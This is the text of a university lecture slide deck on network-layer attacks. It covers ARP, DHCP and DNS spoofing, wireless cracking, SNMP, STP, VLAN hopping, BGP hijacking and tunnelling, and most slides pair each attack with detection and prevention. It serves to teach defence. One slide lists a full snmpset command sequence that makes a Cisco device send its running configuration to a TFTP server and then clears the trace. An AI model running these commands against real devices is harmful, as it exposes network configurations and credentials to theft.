jeroen van beek - os3 · 2018-04-12 · kaminsky dns spoofing attacker’s website contains link to...
TRANSCRIPT
![Page 1: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/1.jpg)
Jeroen van Beek
1
![Page 2: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/2.jpg)
Why bother? Popular / interesting attacks Now what? Questions?
2
![Page 3: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/3.jpg)
Low-level attacks can be very dangerous◦ In many cases difficult to detect / prevent in higher
OSI levels
3
![Page 4: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/4.jpg)
4
![Page 5: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/5.jpg)
Passive attack Works on non-switched networks◦ Including WLAN
Find interesting information◦ Plain text services◦ HTTP logins (see lab assignment)◦ SNMP◦ Telnet (still used in some environments!)◦ Password hashes (‘pass the hash’)
Detection and prevention◦ Use switched networks
5
![Page 6: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/6.jpg)
Active attack Switched environments only show broadcast /
multicast traffic Overflow CAM tables◦ Switch will forward traffic to all ports◦ See dnsniff’s macof
https://www.monkey.org/~dugsong/dsniff/
Detection and prevention◦ Limit the number of MACs per switch port Monitor or auto shutdown
6
![Page 7: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/7.jpg)
Using a forged source IP address to◦ Impersonating other systems
Targets◦ UDP services◦ TCP services with predictable characteristics◦ DoS
7
![Page 8: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/8.jpg)
Oldskewl problem Weak authentication mechanisms using UDP◦ Add your system to the list of trusted systems using a
spoofed packet
More difficult to exploit for TCP services◦ Because of handshaking◦ However not impossible with TCP sequence prediction
However old mistakes are made again◦ Everything over IP◦ Burglar alarm over UDP Including status messages and switching the system off
8
![Page 9: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/9.jpg)
Kaminsky DNS Spoofing◦ Attacker’s website contains link to x.domain.com E.g. an image
◦ Target’s DNS server resolves x.domain.com◦ The attacker knows this and sends replies with fake
records to the target UDP, query ID (QID) identifies reply QID is 16 bit value (65.536) possibilities: send all Include forged referral for domain.com for cache poison
◦ domain.com point to IP of attacker’s choice◦ http://www.blackhat.com/presentations/bh-jp-08/bh-jp-08-
Kaminsky/BlackHat-Japan-08-Kaminsky-DNS08-BlackOps.pdf
9
![Page 10: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/10.jpg)
Mainly used for DoS attacks Increasing efficiency◦ NTP monlist◦ SNMP◦ DNS: ANY query DNSSEC
Send one spoofed packet to broadcast address◦ Many hosts / services reply to spoofed address◦ So called ‘smurf attack’
10
![Page 11: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/11.jpg)
11
![Page 12: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/12.jpg)
Detection◦ Check source IPs IDS
Prevention◦ Do not use source IPs for authentication purposes ◦ Do not use UDP for (indirect) authentication purposes◦ Ingress / egress filtering Drop spoofed packets RFC 2827
12
![Page 13: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/13.jpg)
Used to become a man in the middle Attacker answers clients before the real
server does◦ Provide client with fake DNS servers / gateway / ...
Monitor / modify traffic Detection and prevention◦ Several tools out there for detection: Network devices: DHCP snooping, UNIX: dhcp_probe,
Windows: dhcploc Shutdown unused network ports
◦ Lockdown client PCs
13
![Page 14: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/14.jpg)
Ethernet attack, both for wired and wireless Fake an ARP address to become a man in the
middle
14
![Page 15: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/15.jpg)
Find interesting information◦ Plain text services◦ Password hashes
Use MITM exploits for specific services◦ E.g. SSHv1, HTTPS, POPS, IMAPS, SIPS, RDP
Sophisticated tools are available, automating MITM, sniffing and cracking◦ Ettercap https://github.com/Ettercap/ettercap Sed for network traffic
◦ Cain & Abel http://www.oxid.it/cain.html http://www.youtube.com/watch?v=BXPqq_XQZu8
15
![Page 16: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/16.jpg)
16
![Page 17: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/17.jpg)
Detection and prevention◦ Network devices: ARP inspection◦ Limit the number of MACs per switch port Monitor or auto shutdown
17
![Page 18: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/18.jpg)
In most cases no device authentication In many cases shared secrets◦ WEP (still used for e.g. legacy industrial applications)◦ WPA PSK (‘pre shared keys’)◦ One key to own them all!
Flaws in crypto◦ WEP◦ WPA TKIP◦ WPS
18
![Page 19: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/19.jpg)
Attacking isolated wireless networks◦ High power adapters◦ High gain antennas
Attacking crypto◦ Weaknesses allow an attacker to retrieve secret key◦ Aircrack-ng http://www.aircrack-ng.org/◦ After retrieving the key it’s a virtual plain network cable
Attacking passwords◦ Defaults◦ Easy-to-guess / crack◦ MAC derived
https://www.usenix.org/system/files/conference/woot15/woot15-paper-lorente.pdf
◦ Jam signal first to trigger association messages
19
![Page 20: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/20.jpg)
20
![Page 21: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/21.jpg)
21
![Page 22: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/22.jpg)
Attacking OS functionality◦ Popular OSs store WLAN settings◦ Device tries to find the SSIDs automatically◦ Set up your own access point Forward traffic to real access point
◦ MITM
Detection and prevention◦ Detection of rogue APs◦ Prevent problems by hardening wireless equipment
and by using proven technologies IEEE 802.1x AES encryption
22
![Page 23: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/23.jpg)
Many protocols are used for network management◦ Simple Network Management Protocol (SNMP)
Spanning Tree Protocol (STP)◦ Cisco Discovery Protocol (CDP)◦ Hot Standby Router Protocol (HSRP)◦ …
Most are OSI layer 2 based Most are designed with availability in mind◦ Weak / no security features
Many are enabled by default
23
![Page 24: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/24.jpg)
Example: SNMP◦ Uses ‘community strings’ Some kind of secret password Read-only and read-write Defaults: ‘public’ and ‘private’
◦ Attacks Guess / brute force community string Most OSs: information leakage (accounts, routing) Cisco: dump config
24
![Page 25: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/25.jpg)
25
![Page 26: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/26.jpg)
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.2.111 i 1
#The ConfigCopyProtocol is set to TFTP
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.3.111 i 4
#Set the SourceFileType to running-config
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.4.111 i 1
#Set the DestinationFileType to networkfile
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.5.111 a <TFTP IP>
#Sets the ServerAddress to the IP address of the TFTP server
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.6.111 s <Filename>
#Sets the CopyFilename to your desired file name.
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 1
#Sets the CopyStatus to active which starts the copy process.
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 6
#Sets the CopyStatus to delete which cleans all saved information out of the MIB
26
![Page 27: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/27.jpg)
Example: Spanning Tree Protocol◦ Used for redundancy◦ Takes care of topology changes Broken network links
Network loops
Malfunctioning network devices
◦ One device is the ‘root’ The root can trigger a reconfiguration
◦ During reconfiguration all devices act like a hub Sniffing
◦ No security features in the protocol Become the root and reconfigure the network in such a way
that all traffic pass through your system
27
![Page 28: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/28.jpg)
28
![Page 29: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/29.jpg)
Detection◦ Monitor topology changes In practice: ?
Prevention◦ IP based: ACLs◦ Use security features of network equipment◦ Never use network management protocol on access
ports of end-users◦ Disable all unneeded management protocols
29
![Page 30: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/30.jpg)
Connect to other – less restrictive - VLANs◦ In many cases supported built-in in driver◦ Fancy tools available to make attacks easy to perform, e.g.
(ab)using misconfigured network management protocols: http://www.yersinia.net/
https://github.com/nccgroup/vlan-hopping---frogger
Detection◦ Not needed, just prevent it
Prevention◦ Disable trunk negotiation◦ Configure ports as access ports◦ Don’t use VLAN1
30
![Page 31: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/31.jpg)
Used for core routing on the internet◦ Autonomous Systems (AS) advertize IP ranges that
are reachable using their routers
Become an AS and start peering Advertize IP ranges that aren’t yours◦ Traffic is routed via your systems◦ Sniffing, MITM◦ Happens accidently and on purpose
31
![Page 32: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/32.jpg)
![Page 33: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/33.jpg)
![Page 34: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/34.jpg)
Attacks◦ http://www.blackhat.com/presentations/bh-
europe-09/Rey_Mende/BlackHat-Europe-2009-Mende-Rey-All-Your-Packets-slides.pdf◦ http://www.blackhat.com/docs/us-
15/materials/us-15-Gavrichenkov-Breaking-HTTPS-With-BGP-Hijacking-wp.pdf
Detection◦ Monitoring: https://bgpmon.net/
Prevention◦ RPKI?
34
![Page 35: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/35.jpg)
Abuse authorized protocols to open unauthorized communication channels◦ TCP over ICMP Ptunnel @ http://www.cs.uit.no/~daniels/PingTunnel/
◦ Tunnel IP over DNS Iodine @ http://code.kryo.se/iodine/
◦ Tunnel IP over … Everything!
◦ See https://www.os3.nl/_media/2005-2006/rp1/ms_mk_report.pdf, http://www.delaat.net/rp/2014-2015/p98/report.pdf and recent OT projects
35
![Page 36: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/36.jpg)
36
![Page 37: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/37.jpg)
37
![Page 38: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/38.jpg)
Detection◦ Lab assignment!
Prevention◦ Lab assignment!
38
![Page 39: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/39.jpg)
Sensitive information might also use other networks◦ DECT, GSM, Bluetooth, …
Those are not covered in this talk◦ However: be aware of the risks!
More and more phones and tablets are part of the network…◦ Are they (also) well-protected against the attacks
we’ve seen earlier today?
39
![Page 40: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/40.jpg)
Detection:◦ Detection of well-known attacks using IDS
Prevention:◦ Don’t trust the network! ◦ Shutdown all unused ports◦ Enforce the use of safe protocols Problems on lower OSI levels shouldn’t affect the
security level of applications
There’s more than (wireless) Ethernet◦ Be aware of other technologies that provide access
to sensitive information DECT, GSM, VoIP, …
40
![Page 41: Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to x.domain.com E.g. an image Target’s DNS server resolves x.domain.com The attacker](https://reader030.vdocuments.site/reader030/viewer/2022040410/5ecd42614289ce0dfd6e2ea4/html5/thumbnails/41.jpg)
J.C.vanBeek uva.nl
41